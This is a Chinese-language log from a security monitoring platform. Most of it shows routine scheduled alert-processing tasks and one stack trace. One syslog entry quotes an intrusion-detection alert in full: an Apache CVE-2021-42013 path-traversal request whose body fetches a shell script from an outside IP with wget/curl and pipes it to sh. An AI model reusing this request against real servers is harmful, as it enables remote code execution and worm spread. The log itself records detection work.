2026-05-19 11:49:00.507 [log-processor-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:49:00.523 [scheduling-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:50:00.006 [scheduling-3] INFO c.c.s.ProbeStatusCheckScheduler - ========== 开始探针状态检查 ==========
2026-05-19 11:50:00.006 [scheduling-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:50:00.006 [log-processor-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:50:00.080 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 11:50:00.156 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:0,耗时:76ms
2026-05-19 11:50:00.156 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T11:50:00.156
2026-05-19 11:50:00.156 [scheduling-4] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T11:50:00.156
2026-05-19 11:50:00.229 [scheduling-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:50:00.229 [scheduling-3] INFO c.c.s.ProbeStatusCheckScheduler - 探针状态检查完成,所有探针在线, 耗时: 223ms
2026-05-19 11:50:00.229 [log-processor-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:50:00.374 [scheduling-3] INFO c.c.s.ProbeStatusCheckScheduler - 探针统计: 总数=1, 在线=1, 离线=0
2026-05-19 11:50:00.374 [scheduling-3] INFO c.c.s.ProbeStatusCheckScheduler - ========== 探针状态检查结束 ==========
2026-05-19 11:50:00.470 [scheduling-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:50:00.570 [scheduling-4] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 11:50:00.570 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 414ms
2026-05-19 11:50:00.833 [log-processor-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:51:00.013 [log-processor-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:51:00.013 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 开始执行泛化规则命中时间更新任务,时间:2026-05-19T11:51:00.013
2026-05-19 11:51:00.013 [scheduling-7] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:51:00.237 [scheduling-7] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:51:00.239 [log-processor-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:51:00.515 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_data 表统计到 0 条规则命中记录
2026-05-19 11:51:00.516 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_alarm 表统计到 0 条规则命中记录
2026-05-19 11:51:00.516 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 合并后需要更新的规则数量:0
2026-05-19 11:51:00.536 [log-processor-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:51:00.538 [scheduling-7] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:51:00.665 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 当前启用状态的规则数量:174
2026-05-19 11:51:00.665 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 开始批量更新,规则总数:174,分批数:1
2026-05-19 11:51:00.665 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 泛化规则命中时间更新任务完成,更新规则数:0,耗时:652ms
2026-05-19 11:52:00.015 [scheduling-9] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:52:00.015 [log-processor-4] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:52:00.236 [scheduling-9] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:52:00.240 [log-processor-4] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:52:00.493 [scheduling-9] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:52:00.536 [log-processor-4] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:53:00.011 [log-processor-5] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:53:00.011 [scheduling-7] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:53:00.234 [scheduling-7] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:53:00.235 [log-processor-5] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:53:00.572 [scheduling-7] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:53:00.574 [log-processor-5] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:54:00.011 [log-processor-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:54:00.011 [scheduling-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:54:00.231 [scheduling-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:54:00.232 [log-processor-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:54:00.568 [scheduling-6] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:54:00.572 [log-processor-6] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:55:00.015 [log-processor-7] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:55:00.015 [scheduling-10] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:55:00.089 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 11:55:00.162 [log-processor-7] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:55:00.168 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:0,耗时:79ms
2026-05-19 11:55:00.168 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T11:55:00.168
2026-05-19 11:55:00.168 [scheduling-3] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T11:55:00.168
2026-05-19 11:55:00.238 [scheduling-10] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:55:00.410 [log-processor-7] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:55:00.583 [scheduling-10] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:55:00.584 [scheduling-3] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 11:55:00.584 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 416ms
2026-05-19 11:56:00.003 [scheduling-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:56:00.003 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 开始执行泛化规则命中时间更新任务,时间:2026-05-19T11:56:00.003
2026-05-19 11:56:00.003 [log-processor-8] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:56:00.222 [log-processor-8] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:56:00.225 [scheduling-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:56:00.454 [scheduling-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:56:00.502 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_data 表统计到 0 条规则命中记录
2026-05-19 11:56:00.502 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_alarm 表统计到 0 条规则命中记录
2026-05-19 11:56:00.502 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 合并后需要更新的规则数量:0
2026-05-19 11:56:00.522 [log-processor-8] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:56:00.647 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 当前启用状态的规则数量:174
2026-05-19 11:56:00.647 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 开始批量更新,规则总数:174,分批数:1
2026-05-19 11:56:00.647 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - 泛化规则命中时间更新任务完成,更新规则数:0,耗时:644ms
2026-05-19 11:57:00.005 [scheduling-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:57:00.005 [log-processor-9] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:57:00.223 [scheduling-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:57:00.226 [log-processor-9] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:57:00.450 [scheduling-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:57:00.456 [log-processor-9] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:58:00.012 [scheduling-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:58:00.012 [log-processor-10] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:58:00.235 [log-processor-10] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:58:00.237 [scheduling-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:58:00.466 [scheduling-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:58:00.498 [log-processor-10] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:58:03.645 [scheduling-4] INFO c.c.s.RealtimeAnalysisScheduler - 执行规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, nextTime=2026-05-19T11:58, now=2026-05-19T11:58:03.419
2026-05-19 11:58:03.645 [scheduling-4] INFO c.c.s.impl.AnalysisRuleServiceImpl - 执行实时分析规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 11:58:04.096 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - 滚动窗口查询范围: 窗口大小=10m,查询时间范围=[2026-05-19 11:48:00, 2026-05-19 11:58:00]
2026-05-19 11:58:04.097 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - 开始执行实时规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, batchNo=20260519115803797, windowType=tumble, dataStartTime=2026-05-19 11:48:00, dataEndTime=2026-05-19 11:58:00
2026-05-19 11:58:05.149 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - 生成的SQL: SELECT src_ip AS attack_ip,
dest_ip AS victim_ip,
origin_event_name AS alarm_name,
ARRAY_AGG(DISTINCT src_port) AS attack_port,
ARRAY_AGG(DISTINCT dest_port) AS victim_port,
MAX(event_level) AS alarm_level,
MODE() WITHIN GROUP (ORDER BY dest_domain) AS dns_info,
MODE() WITHIN GROUP (ORDER BY origin_event_type) AS alarm_type,
COUNT(dest_ip) AS log_count,
MAX(attack_result) AS attack_result,
ARRAY_AGG(DISTINCT http_req_header) AS http_req_header,
ARRAY_AGG(DISTINCT http_req_body) AS http_req_body,
ARRAY_AGG(DISTINCT http_resp_header) AS http_resp_header,
ARRAY_AGG(DISTINCT http_resp_body) AS http_resp_body,
ARRAY_AGG(DISTINCT http_url) AS victim_web_url,
ARRAY_AGG(DISTINCT id) AS origin_log_ids,
MIN(log_time) AS log_start_at,
MAX(log_time) AS log_end_at,
ARRAY_AGG(DISTINCT device_id) AS device_id,
ARRAY_AGG(DISTINCT payload) AS payload,
TUMBLE(log_time, INTERVAL '10 MINUTE') AS window_time
FROM syslog_normal_alarm AS t
WHERE log_time >= '2026-05-19 11:48:00' AND log_time < '2026-05-19 11:58:00' AND src_ip != '127.0.0.1' AND event_level >= 1
GROUP BY src_ip, dest_ip, origin_event_name, TUMBLE(log_time, INTERVAL '10 MINUTE')
2026-05-19 11:58:05.606 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - 规则执行成功: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, processedCount=0, alarmCount=0
2026-05-19 11:58:05.910 [scheduling-4] INFO c.c.s.i.RuleExecutionTimeServiceImpl - 更新规则下次执行时间,ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, windowType=tumble, nextExecuteTime=2026-05-19 12:08:00
2026-05-19 11:58:05.910 [scheduling-4] INFO c.c.s.RealtimeAnalysisScheduler - 本次调度执行规则数: 1, 跳过规则数: 0
2026-05-19 11:58:58.083 [http-nio-8089-exec-5] INFO com.controllers.SyslogPushController - 收到syslog发送请求: SyslogRequest{ip='192.168.0.124', port=514, logContent='<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"安恒", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"安恒APT攻击(网络战)预警机", "deviceProductType":"入侵检测系统", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"中国", "srcGeoRegion":"香港", "srcGeoCity":"香港", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"中国", "destGeoRegion":"香港", "destGeoCity":"香港", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013)", "alarmType":"WEB攻击->路径遍历", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-42013). 来源:192.168.101.1/41614, 目的:192.168.101.173/80"}', protocol='TCP', facility='USER', severity='INFO'}
2026-05-19 11:58:58.084 [http-nio-8089-exec-5] INFO com.common.service.SyslogService - 开始发送syslog消息: IP=192.168.0.124, Port=514
2026-05-19 11:58:58.085 [http-nio-8089-exec-5] INFO com.common.service.SyslogService - TCP Syslog消息发送成功: 192.168.0.124:514
2026-05-19 11:58:58.085 [http-nio-8089-exec-5] INFO com.controllers.SyslogPushController - Syslog消息发送成功: IP=192.168.0.124, Port=514
2026-05-19 11:59:00.007 [scheduling-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:59:00.007 [log-processor-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:59:00.157 [scheduling-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:59:00.231 [log-processor-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:59:00.827 [scheduling-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:59:00.842 [log-processor-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:00:00.011 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - ========== 开始探针状态检查 ==========
2026-05-19 12:00:00.011 [scheduling-8] INFO c.c.s.AlarmHealthCheckScheduler - ========== 开始执行告警健康检查 ==========
2026-05-19 12:00:00.011 [scheduling-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:00:00.011 [log-processor-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:00:00.083 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 12:00:00.236 [log-processor-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:00:00.236 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - 探针状态检查完成,所有探针在线, 耗时: 225ms
2026-05-19 12:00:00.236 [scheduling-8] INFO c.c.service.AlarmHealthCheckService - 告警表 alarm_20260519 健康检查: 4小时内数据量=0, 状态=异常
2026-05-19 12:00:00.238 [scheduling-8] ERROR c.c.s.AlarmHealthCheckScheduler - 告警健康检查执行异常: d != java.lang.String
java.util.IllegalFormatConversionException: d != java.lang.String
at java.util.Formatter$FormatSpecifier.failConversion(Formatter.java:4302)
at java.util.Formatter$FormatSpecifier.printInteger(Formatter.java:2793)
at java.util.Formatter$FormatSpecifier.print(Formatter.java:2747)
at java.util.Formatter.format(Formatter.java:2520)
at java.util.Formatter.format(Formatter.java:2455)
at java.lang.String.format(String.java:2940)
at com.common.service.AlarmHealthCheckService.generateAlarmNotification(AlarmHealthCheckService.java:119)
at com.common.service.AlarmHealthCheckService.performHealthCheck(AlarmHealthCheckService.java:48)
at com.common.schedule.AlarmHealthCheckScheduler.scheduledHealthCheck(AlarmHealthCheckScheduler.java:32)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.springframework.scheduling.support.ScheduledMethodRunnable.run(ScheduledMethodRunnable.java:84)
at org.springframework.scheduling.support.DelegatingErrorHandlingRunnable.run(DelegatingErrorHandlingRunnable.java:54)
at org.springframework.scheduling.concurrent.ReschedulingRunnable.run(ReschedulingRunnable.java:95)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:180)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:293)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
2026-05-19 12:00:00.238 [scheduling-8] INFO c.c.s.AlarmHealthCheckScheduler - ========== 告警健康检查任务结束 ==========
2026-05-19 12:00:00.240 [scheduling-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:00:00.247 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:1,耗时:164ms
2026-05-19 12:00:00.247 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T12:00:00.247
2026-05-19 12:00:00.247 [scheduling-4] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T12:00:00.247
2026-05-19 12:00:00.385 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - 探针统计: 总数=1, 在线=1, 离线=0
2026-05-19 12:00:00.385 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - ========== 探针状态检查结束 ==========
2026-05-19 12:00:00.649 [scheduling-4] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 12:00:00.649 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 402ms
2026-05-19 12:00:00.851 [scheduling-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:00:00.851 [log-processor-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:01:00.007 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - 开始执行泛化规则命中时间更新任务,时间:2026-05-19T12:01:00.007
2026-05-19 12:01:00.007 [scheduling-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:01:00.007 [log-processor-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:01:00.230 [log-processor-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:01:00.231 [scheduling-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:01:00.470 [scheduling-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:01:00.662 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_data 表统计到 0 条规则命中记录
2026-05-19 12:01:00.662 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_alarm 表统计到 0 条规则命中记录
2026-05-19 12:01:00.662 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - 合并后需要更新的规则数量:0
2026-05-19 12:01:00.808 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - 当前启用状态的规则数量:174
2026-05-19 12:01:00.808 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - 开始批量更新,规则总数:174,分批数:1
2026-05-19 12:01:00.808 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - 泛化规则命中时间更新任务完成,更新规则数:0,耗时:801ms
2026-05-19 12:01:00.857 [log-processor-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:02:00.011 [scheduling-7] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:02:00.011 [log-processor-4] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:02:00.232 [scheduling-7] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:02:00.234 [log-processor-4] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:02:00.472 [scheduling-7] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:02:00.482 [log-processor-4] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:03:00.011 [scheduling-5] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:03:00.011 [log-processor-5] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:03:00.234 [log-processor-5] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:03:00.235 [scheduling-5] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:03:00.491 [log-processor-5] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:03:00.501 [scheduling-5] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:04:00.011 [log-processor-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:04:00.011 [scheduling-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:04:00.232 [log-processor-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:04:00.234 [scheduling-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:04:00.490 [log-processor-6] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:04:00.498 [scheduling-6] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:05:00.012 [scheduling-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:05:00.012 [log-processor-7] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:05:00.086 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 12:05:00.229 [log-processor-7] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:05:00.244 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:1,耗时:158ms
2026-05-19 12:05:00.244 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T12:05:00.244
2026-05-19 12:05:00.244 [scheduling-2] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T12:05:00.244
2026-05-19 12:05:00.245 [scheduling-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:05:00.483 [log-processor-7] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:05:00.496 [scheduling-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
